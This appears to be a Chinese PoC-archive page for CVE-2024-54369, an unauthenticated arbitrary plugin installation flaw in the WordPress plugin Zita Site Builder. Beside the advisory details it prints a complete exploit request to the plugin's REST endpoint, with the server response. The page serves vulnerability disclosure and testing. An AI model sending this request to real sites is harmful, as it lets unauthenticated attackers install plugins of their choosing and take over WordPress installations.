POC详情: b5aa1372bc83496452905622bdf5c703e5a030ba

来源
关联漏洞
标题: WordPress plugin Zita Site Builder 安全漏洞 (CVE-2024-54369)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Zita Site Builder 1.0.2版本及之前版本存在安全漏洞,该漏洞源于包含一个缺少授权漏洞。
描述
Zita Site Builder <= 1.0.2 - Missing Authorization to Arbitrary Plugin Installation
介绍
# CVE-2024-54369
Zita Site Builder <= 1.0.2 - Missing Authorization to Arbitrary Plugin Installation

# Description

The Zita Site Builder plugin for WordPress is vulnerable to unauthorized access of functionality due to a missing capability check on one of its functions in versions up to, and including, 1.0.2. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins.

## Details

- **Type**: plugin
- **Slug**: ai-site-builder
- **Affected Version**: 1.0.2
- **CVSS Score**: 9.8
- **CVSS Rating**: Critical
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **CVE**: CVE-2024-54369
- **Status**: Closed

POC
---

```
POST /wp-json/ai/v1/ai-site-builder HTTP/2
Host: wp-dev.ddev.site
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://wp-dev.ddev.site/wp-admin/admin.php?page=ai-site-builder&template=step
Content-Type: application/json
Content-Length: 245
Origin: https://wp-dev.ddev.site
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

{"params":{"templateType":"free","plugin":{"woocommerce":"Woocommerce"},"allPlugins":[{"woocommerce":"woocommerce/woocommerce.php"}],"builder":"th-shop-mania","themeSlug":"th-shop-mania","proThemePlugin":"hunk-companion","tmplFreePro":"plugin"}}
```

```
"\"https:\\\/\\\/wp-dev.ddev.site\""
```

文件快照

[4.0K] /data/pocs/b5aa1372bc83496452905622bdf5c703e5a030ba └── [1.5K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。